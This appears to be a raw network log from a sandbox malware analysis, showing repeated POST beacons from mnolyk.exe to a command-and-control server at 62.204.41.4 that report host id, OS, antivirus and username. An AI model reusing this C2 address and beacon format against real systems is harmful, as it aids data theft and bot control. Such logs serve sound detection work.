Feb 7, 2023 20:03:51.805979013 CET	800	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:51.872330904 CET	800	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
646	192.168.2.6	50371	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:52.056353092 CET	801	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:52.119611979 CET	801	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
647	192.168.2.6	50372	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:52.297867060 CET	802	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:52.361998081 CET	802	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
648	192.168.2.6	50373	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:52.533128977 CET	803	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:52.596380949 CET	803	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
649	192.168.2.6	50374	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:52.768198967 CET	804	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:52.831486940 CET	804	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.6	49785	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:07.828926086 CET	185	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:07.894109964 CET	185	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
650	192.168.2.6	50375	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:53.005630016 CET	805	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:53.074157000 CET	805	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
651	192.168.2.6	50376	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:53.252674103 CET	806	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:53.316498995 CET	806	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
652	192.168.2.6	50377	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:53.490588903 CET	807	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:53.555633068 CET	807	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
653	192.168.2.6	50378	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:53.744251966 CET	808	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:53.806940079 CET	808	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
654	192.168.2.6	50379	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:53.987905025 CET	809	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:54.054260015 CET	809	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
655	192.168.2.6	50380	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:54.222459078 CET	810	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:54.284440041 CET	810	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
656	192.168.2.6	50381	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:54.458167076 CET	811	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:54.524271011 CET	811	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
657	192.168.2.6	50382	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:54.707954884 CET	812	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:54.772594929 CET	812	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
658	192.168.2.6	50383	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:54.971539021 CET	812	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:55.034483910 CET	813	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
659	192.168.2.6	50384	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:55.223735094 CET	813	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:55.290314913 CET	814	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.6	49786	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:08.155419111 CET	186	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:08.219896078 CET	186	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
660	192.168.2.6	50385	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:55.477920055 CET	814	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:55.540327072 CET	815	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
661	192.168.2.6	50386	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:55.723367929 CET	815	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:55.788414001 CET	816	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
662	192.168.2.6	50387	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:55.955538034 CET	816	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:56.021003008 CET	817	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
663	192.168.2.6	50388	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:56.189945936 CET	817	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:56.253367901 CET	818	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
664	192.168.2.6	50389	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:56.428558111 CET	818	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
